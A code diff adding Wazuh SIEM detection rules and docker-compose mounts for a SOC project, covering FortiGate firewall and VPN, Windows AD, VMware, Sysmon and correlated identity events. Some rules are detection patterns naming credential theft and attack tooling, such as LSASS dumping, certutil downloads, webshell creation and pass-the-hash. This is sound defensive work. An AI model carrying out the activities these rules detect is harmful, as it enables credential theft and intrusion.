-    <description>A4 production: Account added to privileged group (local scope)</description>
-    <group>soc_mvp_prod,appendix_a,a4,windows,privilege,</group>
-  </rule>
-
-  <!-- Appendix B1: VMware -->
-  <rule id="110401" level="12">
-    <decoded_as>soc-vmware-auth</decoded_as>
-    <match>event_type=vmware_</match>
-    <match>_fail_success</match>
-    <description>B1 production: vCenter login burst pattern</description>
-    <group>soc_mvp_prod,appendix_b,b1,vmware,</group>
-  </rule>
-  <rule id="110402" level="8">
-    <decoded_as>soc-vmware-auth</decoded_as>
-    <match>event_type=vmware_esxi_enable_ssh</match>
-    <description>B1 production: ESXi SSH enabled</description>
-    <group>soc_mvp_prod,appendix_b,b1,vmware,</group>
-  </rule>
-
-  <!-- Appendix B2: Log monitoring -->
-  <rule id="110411" level="5">
-    <decoded_as>soc-log-monitor</decoded_as>
-    <match>event_type=log_loss_detection</match>
-    <match>missing_stream=</match>
-    <description>B2 production: Log loss detection signal</description>
-    <group>soc_mvp_prod,appendix_b,b2,logmonitor,</group>
-  </rule>
-
-  <!-- Appendix B3: Sysmon -->
-  <rule id="110421" level="12">
-    <decoded_as>soc-windows-sysmon</decoded_as>
-    <match>target_process=lsass.exe</match>
-    <description>B3 production: LSASS dump behavior</description>
-    <group>soc_mvp_prod,appendix_b,b3,sysmon,credential_access,</group>
-  </rule>
-  <rule id="110426" level="8">
-    <decoded_as>soc-windows-sysmon</decoded_as>
-    <match>process=certutil.exe</match>
-    <description>B3 production: CertUtil download pattern</description>
-    <group>soc_mvp_prod,appendix_b,b3,sysmon,</group>
-  </rule>
-
-  <!-- Appendix C1-C3: future enhancement (production-prep heuristics) -->
-  <rule id="110501" level="12">
-    <match>event_type=c1_impossible_travel</match>
-    <description>C1 production: Impossible travel correlated event</description>
-    <group>soc_mvp_prod,appendix_c,c1,identity,</group>
-  </rule>
-  <rule id="110511" level="12">
-    <match>event_type=c2_credential_abuse</match>
-    <description>C2 production: Credential abuse correlated event</description>
-    <group>soc_mvp_prod,appendix_c,c2,identity,</group>
-  </rule>
-  <rule id="110521" level="12">
-    <match>event_type=c3_lateral_movement</match>
-    <description>C3 production: Lateral movement correlated event</description>
-    <group>soc_mvp_prod,appendix_c,c3,lateral_movement,</group>
-  </rule>
 </group>

wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a1-ioc-rules.xml

@@ -0,0 +1,47 @@
+<!--
+  SOC Proposal Rules — Appendix A1: DNS / Firewall IOC
+  Simulation profile rule IDs : 100301-100302
+  Production profile rule IDs : 110301-110302
+
+  Severity mapping:
+    Medium → level 8
+
+  Decoded fields used (soc-mvp-dns):
+    status     = event_type  (ioc_dns_traffic | ioc_domain_match)
+    srcip      = source IP
+    url        = queried domain
+    action     = blocked | alert
+-->
+<group name="soc_mvp,appendix_a,a1,ioc,dns,">
+
+  <!-- ── Simulation profile (usecase_id markers present) ── -->
+
+
+
+  <!-- ── Production profile (field-based matching) ── -->
+
+  <rule id="110301" level="8">
+    <if_sid>100250</if_sid>
+    <match>event_type=ioc_dns_traffic</match>
+    <description>A1-01 [PROD] DNS query to malicious domain (IOC traffic indicator)</description>
+    <group>soc_prod,a1,ioc,</group>
+    <mitre>
+      <id>T1071.004</id>
+    </mitre>
+  </rule>
+
+  <rule id="110302" level="8">
+    <if_sid>100250</if_sid>
+    <match>event_type=ioc_domain_match</match>
+    <description>A1-02 [PROD] DNS IOC domain match from threat intelligence feed</description>
+    <group>soc_prod,a1,ioc,</group>
+    <mitre>
+      <id>T1568</id>
+    </mitre>
+  </rule>
+
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
+
+
+
+</group>

wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a2-fortigate-fw-rules.xml

@@ -0,0 +1,113 @@
+<!--
+  SOC Proposal Rules — Appendix A2: FortiGate IPS/IDS & Firewall
+  Simulation profile rule IDs : 100311-100320
+  Production profile rule IDs : 110311-110320
+
+  Severity mapping:
+    High   → level 12
+    Medium → level 8
+    Low    → level 5
+-->
+<group name="soc_mvp,appendix_a,a2,fortigate,">
+
+  <!-- ── Simulation profile ── -->
+
+
+
+
+
+
+
+
+
+
+
+  <!-- ── Production profile (if_group=fortigate, no soc_mvp_test required) ── -->
+
+  <rule id="110311" level="12">
+    <if_group>fortigate</if_group>
+    <match>dstport=3389</match>
+    <match>action="accept"</match>
+    <description>A2-01 [PROD] FortiGate: RDP (3389) traffic allowed</description>
+    <group>soc_prod,a2,rdp,</group>
+    <mitre><id>T1021.001</id></mitre>
+  </rule>
+
+  <rule id="110312" level="12">
+    <if_group>fortigate</if_group>
+    <match>action="password-change"</match>
+    <description>A2-02 [PROD] FortiGate: admin account password changed</description>
+    <group>soc_prod,a2,admin_change,</group>
+    <mitre><id>T1098</id></mitre>
+  </rule>
+
+  <rule id="110313" level="12">
+    <if_group>fortigate</if_group>
+    <match>action="create-admin"</match>
+    <description>A2-03 [PROD] FortiGate: new admin account created</description>
+    <group>soc_prod,a2,admin_change,</group>
+    <mitre><id>T1136</id></mitre>
+  </rule>
+
+  <rule id="110314" level="12">
+    <if_group>fortigate</if_group>
+    <match>action="config-change"</match>
+    <match>config_value=disable</match>
+    <description>A2-04 [PROD] FortiGate: alerting/notification disabled via config change</description>
+    <group>soc_prod,a2,defense_evasion,</group>
+    <mitre><id>T1562</id></mitre>
+  </rule>
+
+  <rule id="110315" level="5">
+    <if_group>fortigate</if_group>
+    <match>action="download-config"</match>
+    <description>A2-05 [PROD] FortiGate: firewall configuration file downloaded</description>
+    <group>soc_prod,a2,config,</group>
+    <mitre><id>T1005</id></mitre>
+  </rule>
+
+  <rule id="110316" level="8">
+    <if_group>fortigate</if_group>
+    <match>subtype="ips"</match>
+    <match>attack="Multiple.Critical</match>
+    <description>A2-06 [PROD] FortiGate IPS: multiple critical signatures triggered</description>
+    <group>soc_prod,a2,ips,</group>
+    <mitre><id>T1595</id></mitre>
+  </rule>
+
+  <rule id="110317" level="5">
+    <if_group>fortigate</if_group>
+    <match>subtype="anomaly"</match>
+    <match>attack="TCP.Port.Scan"</match>
+    <description>A2-07 [PROD] FortiGate: TCP port scan from external IP</description>
+    <group>soc_prod,a2,recon,</group>
+    <mitre><id>T1046</id></mitre>
+  </rule>
+
+  <rule id="110318" level="8">
+    <if_group>fortigate</if_group>
+    <match>subtype="ips"</match>
+    <match>ioc_type=ip</match>
+    <description>A2-08 [PROD] FortiGate IPS: IOC-based IP indicator detected</description>
+    <group>soc_prod,a2,ioc,</group>
+    <mitre><id>T1071.001</id></mitre>
+  </rule>
+
+  <rule id="110319" level="8">
+    <if_group>fortigate</if_group>
+    <match>subtype="anomaly"</match>
+    <match>attack="Internal.Port.Scan"</match>
+    <description>A2-09 [PROD] FortiGate: internal port scan from private source IP</description>
+    <group>soc_prod,a2,recon,</group>
+    <mitre><id>T1046</id></mitre>
+  </rule>
+
+  <rule id="110320" level="8">
+    <if_group>fortigate</if_group>
+    <match>threat_label="known-c2"</match>
+    <description>A2-10 [PROD] FortiGate: traffic to known C2/malicious IP allowed</description>
+    <group>soc_prod,a2,ioc,c2,</group>
+    <mitre><id>T1071.001</id></mitre>
+  </rule>
+
+</group>

wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a3-fortigate-vpn-rules.xml

@@ -0,0 +1,66 @@
+<!--
+  SOC Proposal Rules — Appendix A3: FortiGate VPN
+  Simulation profile rule IDs : 100331-100335
+  Production profile rule IDs : 110331-110335
+
+  Severity mapping:
+    High → level 12
+    Low  → level 5
+-->
+<group name="soc_mvp,appendix_a,a3,vpn,fortigate,">
+
+  <!-- ── Simulation profile ── -->
+
+
+
+
+
+
+  <!-- ── Production profile (if_group=fortigate) ── -->
+
+  <rule id="110331" level="12">
+    <if_group>fortigate</if_group>
+    <match>action="ssl-login-success"</match>
+    <match>user="guest"</match>
+    <description>A3-01 [PROD] VPN authentication success by guest account</description>
+    <group>soc_prod,a3,vpn_guest,</group>
+    <mitre><id>T1078.001</id></mitre>
+  </rule>
+
+  <rule id="110332" level="12">
+    <if_group>fortigate</if_group>
+    <match>action="ssl-login-success"</match>
+    <match>previous_country=</match>
+    <description>A3-02 [PROD] VPN success from different country than last login</description>
+    <group>soc_prod,a3,vpn_geo,</group>
+    <mitre><id>T1078</id></mitre>
+  </rule>
+
+  <rule id="110333" level="12">
+    <if_group>fortigate</if_group>
+    <match>action="ssl-login-success"</match>
+    <match>failed_attempts_before_success=</match>
+    <description>A3-03 [PROD] VPN success after multiple prior failures (brute-force indicator)</description>
+    <group>soc_prod,a3,vpn_bruteforce,</group>
+    <mitre><id>T1110.001</id></mitre>
+  </rule>
+
+  <rule id="110334" level="5">
+    <if_group>fortigate</if_group>
+    <match>action="ssl-login-fail"</match>
+    <match>failed_accounts=</match>
+    <description>A3-04 [PROD] VPN multiple account failures from single source IP</description>
+    <group>soc_prod,a3,vpn_bruteforce,</group>
+    <mitre><id>T1110.003</id></mitre>
+  </rule>
+
+  <rule id="110335" level="12">
+    <if_group>fortigate</if_group>
+    <match>action="ssl-login-success"</match>
+    <match>expected_country=TH</match>
+    <description>A3-05 [PROD] VPN authentication success from outside Thailand</description>
+    <group>soc_prod,a3,vpn_geo,</group>
+    <mitre><id>T1078</id></mitre>
+  </rule>
+
+</group>

wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a4-windows-ad-rules.xml

@@ -0,0 +1,168 @@
+<!--
+  SOC Proposal Rules — Appendix A4: Windows / Active Directory
+  Simulation profile rule IDs : 100341-100364
+  Production profile rule IDs : 110341-110364
+
+  Production rules use specific built-in Wazuh rule SIDs as parents
+  to avoid the N×M rule-tree explosion from if_group=windows:
+    60105/60122 → event 4625 (auth failure)
+    60106       → event 4624 (auth success / logon)
+    60109       → events 4720/4722 (account create/enable)
+    60113       → events 4728/4732 (group membership change)
+    67027       → event 4688 (new process created)
+    60103       → event 4794 (DSRM password set)
+-->
+<group name="soc_mvp,appendix_a,a4,windows,">
+
+  <!-- ── Simulation profile ── -->
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+  <!-- ── Production profile ──
+       Parents are specific built-in Wazuh SIDs (not if_group=windows) to
+       avoid N×M rule-tree explosion. Each parent fires for one event ID.
+  -->
+
+  <!-- A4-01/02/19: Auth failures (event 4625)
+       Parent: 60105 (4625 base), 60122 (4625 variant) -->
+  <rule id="110341" level="8">
+    <if_sid>60105, 60122</if_sid>
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)admin</field>
+    <description>A4-01 [PROD] Windows: privileged account name auth failure (4625)</description>
+    <group>soc_prod,a4,auth_fail,</group>
+    <mitre><id>T1110.001</id></mitre>
+  </rule>
+
+  <rule id="110342" level="8">
+    <if_sid>60105, 60122</if_sid>
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)svc|service|\$$</field>
+    <description>A4-02 [PROD] Windows: service account auth failure (4625)</description>
+    <group>soc_prod,a4,auth_fail,</group>
+    <mitre><id>T1110.001</id></mitre>
+  </rule>
+
+  <rule id="110359" level="5">
+    <if_sid>60105, 60122</if_sid>
+    <description>A4-19 [PROD] Windows: authentication failure (4625)</description>
+    <group>soc_prod,a4,spray,</group>
+    <mitre><id>T1110.003</id></mitre>
+  </rule>
+
+  <!-- A4-03: AD enumeration via process execution (event 4688)
+       Parent: 67027 (new process created) -->
+  <rule id="110343" level="8">
+    <if_sid>67027</if_sid>
+    <field name="win.eventdata.newProcessName" type="pcre2">(?i)adfind\.exe</field>
+    <description>A4-03 [PROD] Windows AD: adfind enumeration tool executed (4688)</description>
+    <group>soc_prod,a4,ad_enum,</group>
+    <mitre><id>T1087.002</id></mitre>
+  </rule>
+
+  <!-- A4-06/07/08/09/10: Auth successes (event 4624)
+       Parent: 60106 (logon success) -->
+  <rule id="110346" level="12">
+    <if_sid>60106</if_sid>
+    <field name="win.eventdata.logonType">^10$</field>
+    <description>A4-06 [PROD] Windows: remote interactive auth success logon type 10 (4624)</description>
+    <group>soc_prod,a4,auth_success,remote,</group>
+    <mitre><id>T1021.001</id></mitre>
+    <mitre><id>T1078</id></mitre>
+  </rule>
+
+  <rule id="110348" level="12">
+    <if_sid>60106</if_sid>
+    <field name="win.eventdata.authenticationPackageName">NTLM</field>
+    <field name="win.eventdata.logonType">^3$</field>
+    <description>A4-08 [PROD] Windows: NTLM network logon type 3 — pass-the-hash indicator (4624)</description>
+    <group>soc_prod,a4,pth,</group>
+    <mitre><id>T1550.002</id></mitre>
+  </rule>
+
+  <rule id="110349" level="12">
+    <if_sid>60106</if_sid>
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)^guest$</field>
+    <description>A4-09 [PROD] Windows: guest account auth success (4624)</description>
+    <group>soc_prod,a4,auth_success,guest,</group>
+    <mitre><id>T1078.001</id></mitre>
+  </rule>
+
+  <rule id="110350" level="12">
+    <if_sid>60106</if_sid>
+    <field name="win.eventdata.logonType">^2$</field>
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)svc|service|\$$</field>
+    <description>A4-10 [PROD] Windows: service account interactive logon type 2 (4624)</description>
+    <group>soc_prod,a4,service_account,</group>
+    <mitre><id>T1078.003</id></mitre>
+  </rule>
+
+  <!-- A4-11/12: Group membership changes (events 4728/4732)
+       Parent: 60113 (member added to security-enabled group) -->
+  <rule id="110352" level="12">
+    <if_sid>60113</if_sid>
+    <field name="win.system.eventID">^4728$</field>
+    <description>A4-12 [PROD] Windows: account added to privileged domain group (4728)</description>
+    <group>soc_prod,a4,privilege_escalation,</group>
+    <mitre><id>T1098.007</id></mitre>
+  </rule>
+
+  <rule id="110353" level="12">
+    <if_sid>60113</if_sid>
+    <field name="win.system.eventID">^4732$</field>
+    <description>A4-11 [PROD] Windows: account added to privileged local group (4732)</description>
+    <group>soc_prod,a4,privilege_escalation,</group>
+    <mitre><id>T1098.007</id></mitre>
+  </rule>
+
+  <!-- A4-13: DSRM password set (event 4794)
+       Parent: 60103 -->
+  <rule id="110354" level="12">
+    <if_sid>60103</if_sid>
+    <description>A4-13 [PROD] Windows DC: DSRM account password set (4794)</description>
+    <group>soc_prod,a4,persistence,</group>
+    <mitre><id>T1098</id></mitre>
+  </rule>
+
+  <!-- A4-21/22/23/24: Account lifecycle (events 4720/4722)
+       Parent: 60109 (account created/enabled) -->
+  <rule id="110361" level="5">
+    <if_sid>60109</if_sid>
+    <field name="win.system.eventID">^4720$</field>
+    <description>A4-21/23 [PROD] Windows: new user account created (4720)</description>
+    <group>soc_prod,a4,account_create,</group>
+    <mitre><id>T1136</id></mitre>
+  </rule>
+
+  <rule id="110362" level="5">
+    <if_sid>60109</if_sid>
+    <field name="win.system.eventID">^4722$</field>
+    <description>A4-22/24 [PROD] Windows: user account re-enabled (4722)</description>
+    <group>soc_prod,a4,account_lifecycle,</group>
+    <mitre><id>T1078</id></mitre>
+  </rule>
+
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
+
+
+</group>

wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b1-vmware-rules.xml

@@ -0,0 +1,44 @@
+<!--
+  SOC Proposal Rules — Appendix B1: VMware vCenter / ESXi
+  Simulation profile rule IDs : 100401-100403
+  Production profile rule IDs : 110401-110403
+-->
+<group name="soc_mvp,appendix_b,b1,vmware,">
+
+  <!-- ── Simulation profile ── -->
+
+
+
+
+  <!-- ── Production profile (if_group=vmware + real log patterns) ── -->
+
+  <rule id="110401" level="12">
+    <if_group>vmware</if_group>
+    <match>Login failure</match>
+    <description>B1-01 [PROD] vCenter: login failure detected (brute-force indicator)</description>
+    <group>soc_prod,b1,vcenter,auth,</group>
+    <mitre><id>T1110</id></mitre>
+  </rule>
+
+  <rule id="110402" level="8">
+    <if_group>vmware</if_group>
+    <match>SSH login is enabled</match>
+    <description>B1-02 [PROD] ESXi: SSH service enabled on host</description>
+    <group>soc_prod,b1,esxi,ssh,</group>
+    <mitre><id>T1021.004</id></mitre>
+  </rule>
+
+  <rule id="110403" level="12">
+    <if_group>vmware</if_group>
+    <match>sshd</match>
+    <description>B1-03 [PROD] ESXi: SSH authentication event detected</description>
+    <group>soc_prod,b1,esxi,ssh,</group>
+    <mitre><id>T1021.004</id></mitre>
+  </rule>
+
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
+
+
+
+
+</group>

wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b2-logmon-rules.xml

@@ -0,0 +1,22 @@
+<!--
+  SOC Proposal Rules — Appendix B2: Log Monitoring
+  Simulation profile rule IDs : 100411
+  Production profile rule IDs : 110411
+-->
+<group name="soc_mvp,appendix_b,b2,logmonitor,">
+
+  <!-- ── Simulation profile ── -->
+
+
+  <!-- ── Production profile (anchored to 100260 = soc-prod-integrator) ── -->
+
+  <rule id="110411" level="5">
+    <if_sid>100260</if_sid>
+    <match>event_type=log_loss_detection</match>
+    <description>B2-01 [PROD] Log Monitor: log ingestion loss detected on monitored stream</description>
+    <group>soc_prod,b2,log_loss,</group>
+    <mitre><id>T1562.006</id></mitre>
+  </rule>
+
+
+</group>

wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b3-sysmon-rules.xml

@@ -0,0 +1,97 @@
+<!--
+  SOC Proposal Rules — Appendix B3: Windows Sysmon
+  Simulation profile rule IDs : 100421-100426
+  Production profile rule IDs : 110421-110426
+
+  Production rules use specific built-in Wazuh Sysmon SIDs as parents
+  to avoid the N×M rule-tree explosion from if_group=sysmon:
+    61603 → Sysmon event 1  (process create)
+    61612 → Sysmon event 10 (process access)
+    61613 → Sysmon event 11 (file create)
+-->
+<group name="soc_mvp,appendix_b,b3,sysmon,">
+
+  <!-- ── Simulation profile ── -->
+
+
+
+
+
+
+
+  <!-- ── Production profile ──
+       Parents are specific built-in Wazuh Sysmon SIDs (not if_group=sysmon)
+       to avoid N×M rule-tree explosion.
+  -->
+
+  <!-- B3-01: LSASS process access via procdump (Sysmon event 10)
+       Parent: 61612 (Sysmon event 10 - process access) -->
+  <rule id="110421" level="12">
+    <if_sid>61612</if_sid>
+    <field name="win.eventdata.targetImage" type="pcre2">(?i)lsass\.exe</field>
+    <description>B3-01 [PROD] Sysmon: LSASS process access detected (event 10)</description>
+    <group>soc_prod,b3,credential_access,lsass,</group>
+    <mitre><id>T1003.001</id></mitre>
+  </rule>
+
+  <!-- B3-02: SQL injection keywords in process command line (Sysmon event 1)
+       Parent: 61603 (Sysmon event 1 - process create) -->
+  <rule id="110422" level="12">
+    <if_sid>61603</if_sid>
+    <field name="win.eventdata.commandLine" type="pcre2">(?i)select|union|insert|drop|exec</field>
+    <description>B3-02 [PROD] Sysmon: SQL keyword in process command line (event 1)</description>
+    <group>soc_prod,b3,webapp,sqli,</group>
+    <mitre><id>T1190</id></mitre>
+  </rule>
+
+  <!-- B3-03: Web script file creation (Sysmon event 11)
+       Parent: 61613 (Sysmon event 11 - file create) -->
+  <rule id="110423" level="12">
+    <if_sid>61613</if_sid>
+    <field name="win.eventdata.targetFilename" type="pcre2">\.(?:php|aspx|asp|jsp)$</field>
+    <description>B3-03 [PROD] Sysmon: web script file created (possible webshell, event 11)</description>
+    <group>soc_prod,b3,webapp,webshell,</group>
+    <mitre><id>T1505.003</id></mitre>
+  </rule>
+
+  <!-- B3-04: msiexec uninstall (Sysmon event 1)
+       Parent: 61603 (Sysmon event 1 - process create) -->
+  <rule id="110424" level="12">
+    <if_sid>61603</if_sid>
+    <field name="win.eventdata.commandLine" type="pcre2">(?i)msiexec</field>
+    <field name="win.eventdata.commandLine" type="pcre2">(?i)/x|/uninstall</field>
+    <description>B3-04 [PROD] Sysmon: msiexec uninstall detected (event 1)</description>
+    <group>soc_prod,b3,defense_evasion,</group>
+    <mitre><id>T1562.001</id></mitre>
+  </rule>
+
+  <!-- B3-05: LSASS dump via Task Manager (Sysmon event 10)
+       Parent: 61612 (Sysmon event 10 - process access) -->
+  <rule id="110425" level="12">
+    <if_sid>61612</if_sid>
+    <field name="win.eventdata.sourceImage" type="pcre2">(?i)Taskmgr\.exe</field>
+    <field name="win.eventdata.targetImage" type="pcre2">(?i)lsass\.exe</field>
+    <description>B3-05 [PROD] Sysmon: LSASS dump via Task Manager (event 10)</description>
+    <group>soc_prod,b3,credential_access,lsass,</group>
+    <mitre><id>T1003.001</id></mitre>
+  </rule>
+
+  <!-- B3-06: certutil download (Sysmon event 1)
+       Parent: 61603 (Sysmon event 1 - process create) -->
+  <rule id="110426" level="8">
+    <if_sid>61603</if_sid>
+    <field name="win.eventdata.image" type="pcre2">(?i)certutil\.exe</field>
+    <description>B3-06 [PROD] Sysmon: certutil.exe execution detected (event 1)</description>
+    <group>soc_prod,b3,download,</group>
+    <mitre><id>T1105</id></mitre>
+  </rule>
+
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
+
+
+
+
+
+
+
+</group>

wazuh-docker/single-node/config/wazuh_cluster/rules/soc-c1-c3-rules.xml

@@ -0,0 +1,134 @@
+<!--
+  SOC Proposal Rules — Appendix C1-C3
+  C1: Impossible Travel
+  C2: Advanced Credential Abuse & Privilege Misuse
+  C3: Lateral Movement & Internal Reconnaissance
+
+  Simulation profile rule IDs : 100501, 100511-100514, 100521-100524
+  Production profile rule IDs : 110501, 110502, 110511-110514, 110521-110524
+
+  C1 prod: if_group=fortigate (VPN) or if_sid=100260 (soc-integrator)
+  C2/C3 prod: specific built-in Wazuh SIDs to avoid N×M explosion:
+    60106 → event 4624 (auth success / logon)
+    60113 → events 4728/4732 (group membership change)
+-->
+<group name="soc_mvp,appendix_c,">
+
+  <!-- ================================================================
+       C1: Impossible Travel Detection
+       ================================================================ -->
+
+
+  <rule id="110501" level="12">
+    <if_group>fortigate</if_group>
+    <match>action="ssl-login-success"</match>
+    <description>C1-01 [PROD] VPN login success with geo context — impossible travel candidate</description>
+    <group>soc_prod,c1,impossible_travel,identity,</group>
+    <mitre><id>T1078</id></mitre>
+  </rule>
+
+  <rule id="110502" level="15">
+    <if_sid>100260</if_sid>
+    <match>event_type=c1_impossible_travel</match>
+    <description>C1-01 [PROD] Impossible travel confirmed by soc-integrator correlation</description>
+    <group>soc_prod,c1,impossible_travel,identity,</group>
+    <mitre><id>T1078</id></mitre>
+  </rule>
+
+
+
+  <!-- ================================================================
+       C2: Advanced Credential Abuse & Privilege Misuse
+       ================================================================ -->
+
+
+
+
+
+  <!-- C2 production rules
+       Parent: 60106 (event 4624 - logon success) for auth rules
+               60113 (events 4728/4732 - group membership) for privilege rules -->
+
+  <rule id="110511" level="12">
+    <if_sid>60106</if_sid>
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)admin</field>
+    <description>C2-01 [PROD] Privileged account auth success (4624)</description>
+    <group>soc_prod,c2,credential_abuse,identity,</group>
+    <mitre><id>T1078.002</id></mitre>
+  </rule>
+
+  <rule id="110512" level="8">
+    <if_sid>60106</if_sid>
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)legacy</field>
+    <description>C2-02 [PROD] Dormant/legacy account auth success (4624)</description>
+    <group>soc_prod,c2,credential_abuse,identity,</group>
+    <mitre><id>T1078</id></mitre>
+  </rule>
+
+  <rule id="110513" level="12">
+    <if_sid>60106</if_sid>
+    <field name="win.eventdata.logonType">^10$</field>
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)svc|service|\$$</field>
+    <description>C2-03 [PROD] Service account remote interactive logon type 10 (4624)</description>
+    <group>soc_prod,c2,service_account,identity,</group>
+    <mitre><id>T1078.003</id></mitre>
+  </rule>
+
+  <rule id="110514" level="12">
+    <if_sid>60113</if_sid>
+    <field name="win.system.eventID">^4732$</field>
+    <description>C2-04 [PROD] Privilege escalation: group membership change (4732)</description>
+    <group>soc_prod,c2,privilege_escalation,identity,</group>
+    <mitre><id>T1098.007</id></mitre>
+  </rule>
+
+
+
+
+
+  <!-- ================================================================
+       C3: Lateral Movement & Internal Reconnaissance
+       ================================================================ -->
+
+
+
+
+
+  <!-- C3 production rules
+       Parent: 60106 (event 4624 - logon success) -->
+
+  <rule id="110521" level="12">
+    <if_sid>60106</if_sid>
+    <field name="win.eventdata.logonType">^10$</field>
+    <description>C3-01/02 [PROD] RDP auth success logon type 10 (lateral movement indicator)</description>
+    <group>soc_prod,c3,lateral_movement,rdp,</group>
+    <mitre><id>T1021.001</id></mitre>
+    <mitre><id>T1078</id></mitre>
+  </rule>
+
+  <rule id="110522" level="12">
+    <if_sid>60106</if_sid>
+    <field name="win.eventdata.logonType">^3$</field>
+    <description>C3-02 [PROD] SMB network logon type 3 (lateral movement indicator)</description>
+    <group>soc_prod,c3,lateral_movement,smb,</group>
+    <mitre><id>T1021.002</id></mitre>
+    <mitre><id>T1078</id></mitre>
+  </rule>
+
+  <rule id="110523" level="15">
+    <if_sid>60106</if_sid>
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)admin</field>
+    <description>C3-03 [PROD] Admin account auth success — lateral movement candidate (4624)</description>
+    <group>soc_prod,c3,lateral_movement,admin,</group>
+    <mitre><id>T1021.001</id></mitre>
+    <mitre><id>T1078.002</id></mitre>
+  </rule>
+
+  <!-- C3-04 PROD: WFP event 5156 has no specific built-in Wazuh parent SID.
+       Skip prod rule to avoid N×M explosion from using a generic windows parent. -->
+
+
+
+
+
+</group>

wazuh-docker/single-node/docker-compose.yml

@@ -44,6 +44,14 @@ services:
       - ./config/wazuh_cluster/wazuh_manager.conf:/var/ossec/etc/ossec.conf
       - ./config/wazuh_cluster/local_decoder.xml:/var/ossec/etc/decoders/local_decoder.xml
       - ./config/wazuh_cluster/local_rules.xml:/var/ossec/etc/rules/local_rules.xml
+      - ./config/wazuh_cluster/rules/soc-a1-ioc-rules.xml:/var/ossec/etc/rules/soc-a1-ioc-rules.xml
+      - ./config/wazuh_cluster/rules/soc-a2-fortigate-fw-rules.xml:/var/ossec/etc/rules/soc-a2-fortigate-fw-rules.xml
+      - ./config/wazuh_cluster/rules/soc-a3-fortigate-vpn-rules.xml:/var/ossec/etc/rules/soc-a3-fortigate-vpn-rules.xml
+      - ./config/wazuh_cluster/rules/soc-a4-windows-ad-rules.xml:/var/ossec/etc/rules/soc-a4-windows-ad-rules.xml
+      - ./config/wazuh_cluster/rules/soc-b1-vmware-rules.xml:/var/ossec/etc/rules/soc-b1-vmware-rules.xml
+      - ./config/wazuh_cluster/rules/soc-b2-logmon-rules.xml:/var/ossec/etc/rules/soc-b2-logmon-rules.xml
+      - ./config/wazuh_cluster/rules/soc-b3-sysmon-rules.xml:/var/ossec/etc/rules/soc-b3-sysmon-rules.xml
+      - ./config/wazuh_cluster/rules/soc-c1-c3-rules.xml:/var/ossec/etc/rules/soc-c1-c3-rules.xml
 
   wazuh.indexer:
     image: wazuh/wazuh-indexer:4.14.3